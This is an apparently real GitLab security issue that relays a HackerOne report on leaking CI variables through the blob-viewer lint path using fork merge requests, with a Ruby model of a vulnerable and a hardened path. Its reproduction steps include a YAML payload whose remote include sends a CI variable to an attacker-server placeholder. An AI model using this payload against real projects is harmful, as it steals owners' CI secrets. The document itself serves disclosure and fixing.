
Backend: Leaking CI variables by visiting the blob page via fork MRs

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1875515 by shells3c on 2023-02-15, assigned to @cmaxim:


Report

SSOT

Refer to #417275 (closed)

Summary

When viewing the GitLab CI configuration, GitLab runs CI linting on the file content.

app/models/blob_viewer/gitlab_ci_yml.rb

    # Lint runs in the context of the viewed project, so the project's CI variables are in scope.
    def validation_message(opts)
      return @validation_message if defined?(@validation_message)

      prepare!

      @validation_message = Gitlab::Ci::Lint
        .new(project: opts[:project], current_user: opts[:user], sha: opts[:sha])
        .validate(blob.data).errors.first
    end

The CI validation is run within the context of the viewed project, therefore the project's CI variables can be used here. blob.data is the CI configuration content from a blob of the project and can be manipulated because, even without Developer permission, I can still push a blob to the project by creating a merge request (commits of a merge request will be fetched into the repository object pool). This allows me to run CI lint on the project without create_pipeline permission (the permission is checked in the CI lint API and GraphQL).

Steps to reproduce
  1. Create a project, create a CI variable in General > CI/CD > Variables, let's say variable_x
  2. As the attacker, fork the project, and edit the CI configuration (.gitlab-ci.yml by default) with the following content (replace <ATTACKER SERVER>):

    include:
      remote: 'http://<ATTACKER SERVER>/${variable_x}.yaml'

  3. Create a merge request with the previous change
  4. Now grab the commit SHA, visit this link and the variable will be sent to your server: https://gitlab.com/<victim>/<project>/-/blob/<sha>/.gitlab-ci.yml
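The trust-boundary gap that the summary and the steps above describe, modelled as an added stand-alone Ruby example (not GitLab's code): a stub linter that expands ${VAR} references in remote includes using the project's variables, the blob-viewer path that lints any blob regardless of which ref carries it, and a hardened variant that assumes the same create_pipeline check the report says the CI lint API and GraphQL already perform. Project, User, Lint, the SHAs and the sample values are constructed for this illustration.

```ruby
require 'yaml'

# Constructed model of the blob-viewer lint path (assumption: not GitLab's code).
Project = Struct.new(:variables, :ref_shas)   # ref_shas: commits reachable from the project's own refs
User    = Struct.new(:can_create_pipeline)    # the permission the CI lint API already checks

# Stand-in linter: resolves `include: remote:` URLs in the project's variable context and
# returns them instead of fetching, so the leak is observable without any network access.
class Lint
  def initialize(project:, current_user:)
    @project = project
    @user = current_user
  end

  def remote_includes(yaml)
    config = YAML.safe_load(yaml) || {}
    includes = config['include']
    includes = [includes] unless includes.is_a?(Array)
    includes.select { |inc| inc.is_a?(Hash) && inc['remote'] }
            .map { |inc| expand(inc['remote']) }
  end

  private

  # ${VAR} placeholders are replaced with the project's CI variable values.
  def expand(url)
    url.gsub(/\$\{(\w+)\}/) { @project.variables.fetch(Regexp.last_match(1), '') }
  end
end

# Vulnerable shape from the report: the blob viewer lints whatever blob it is shown,
# including a commit that only reached the repository through a fork merge request.
def vulnerable_validation(project:, user:, sha:, data:)
  Lint.new(project: project, current_user: user).remote_includes(data)
end

# Hardened shape (assumption, not the fix GitLab shipped): lint only when the blob sits on a
# ref the project owns AND the viewer holds the create_pipeline permission.
def hardened_validation(project:, user:, sha:, data:)
  return [] unless project.ref_shas.include?(sha) && user.can_create_pipeline
  Lint.new(project: project, current_user: user).remote_includes(data)
end

# Constructed sample: a fork-MR commit ("fork-sha") carrying the include from the report.
PROJECT  = Project.new({ 'variable_x' => 'constructed-secret' }, ['main-sha'])
CI_YAML  = "include:\n  remote: 'http://example.invalid/${variable_x}.yaml'\n"
ATTACKER = User.new(false)
```

Running vulnerable_validation on the fork commit yields the URL with the variable value substituted in, while hardened_validation returns nothing for that commit and only expands includes for blobs on the project's own refs viewed by a user who may create pipelines.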

Output of checks

This bug happens on GitLab.com

Impact

Unauthorized users can leak CI variables

Proposal

We are still discussing if it would make sense to disable CI Linter for external ref.

How To Reproduce

Please add reproducibility information to this section:


Edited by 🤖 GitLab Bot 🤖